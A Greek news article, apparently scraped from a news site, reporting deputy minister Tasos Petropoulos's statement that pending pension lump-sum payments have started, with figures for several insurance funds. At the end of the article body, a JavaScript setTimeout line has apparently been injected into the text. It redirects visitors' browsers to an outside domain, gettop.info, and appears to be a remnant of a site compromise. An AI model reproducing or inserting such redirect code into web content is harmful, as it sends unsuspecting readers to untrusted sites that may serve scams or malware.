Πετρόπουλος: Χορηγούνται ήδη εφάπαξ

0
7

 

Ξεκίνησε η χορήγηση των εκκρεμών εφάπαξ, όπως αναφέρει σε δήλωσή του στο Αθηναϊκό Πρακτορείο ο υφυπουργός Κοινωνικής Ασφάλισης Τάσος Πετρόπουλος.

«Είχαμε προαναγγείλει ότι η χορήγηση των εφάπαξ θα είναι ταχύτατη» επισημαίνει ο κ. Πετρόπουλος, ο οποίος τονίζει ότι, «μετά τον Σεπτέμβριο του 2013, έχουν αρχίσει εδώ και τέσσερις ημέρες να χορηγούνται, αρχικά στο Ταμείο Προνοίας Δημοσίων Υπαλλήλων, για το οποίο οι μάντεις κακών ειδήσεων έλεγαν ότι δεν υπάρχει καμία περίπτωση μέσα σε δύο χρόνια να δοθούν εφάπαξ».

«Ήδη έχουν καταβληθεί εφάπαξ σε περίπου 8.000 δικαιούχους, ενώ υπογραμμίζει ότι εκκρεμούν περίπου 28.000 εφάπαξ, τα οποία, όμως, θα έχουν εξοφληθεί μέσα στο 2017, μετά την τριετή παύση πληρωμών. Σήμερα, έχει ήδη ανακοινώσει το Ενιαίο Ταμείο Ανεξάρτητα Απασχολουμένων (ΕΤΑΑ) ότι θα χορηγηθούν τα εφάπαξ για τους εργολήπτες-υπολογίζονται περίπου 1.000 δικαιούχοι.

Για τους δικηγόρους, τα εφάπαξ που θα καταβληθούν, ξεπερνούν τα 500, ενώ πάνω από 1.000 γιατροί θα εισπράξουν και αυτοί το εφάπαξ, μετά την έκδοση της δικής μου Υπουργικής Απόφασης, η οποία ορίζει τον τρόπο υπολογισμού του, επειδή αυτές οι κατηγορίες ασφαλισμένων κατέβαλαν εισφορά σε ακέραιο ποσό και όχι ως ποσοστό, διότι ο νόμος προβλέπει αναλογιστικές μελέτες για όσους δεν έχουν ποσοστιαία εισφορά», σημείωσε ο υφυπουργός.

Αναφορικά με το Ταμείο των Δημοσίων Υπαλλήλων- το Μετοχικό Ταμείο των Πολιτικών Υπαλλήλων– ο κ. Πετρόπουλος δηλώνει ότι έχει εξασφαλισθεί χρηματοδότηση, για να προχωρήσει γρήγορα η έκδοση σχετικών οφειλομένων στους ασφαλισμένους. «Πάμε γρήγορα, ταχύτατα και αποκαθιστούμε τη σχέση που έχουν οι ασφαλισμένοι με τους φορείς, οι οποίοι ανταποκρίνονται στις υποχρεώσεις απέναντί τους» αναφέρει χαρακτηριστικά. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here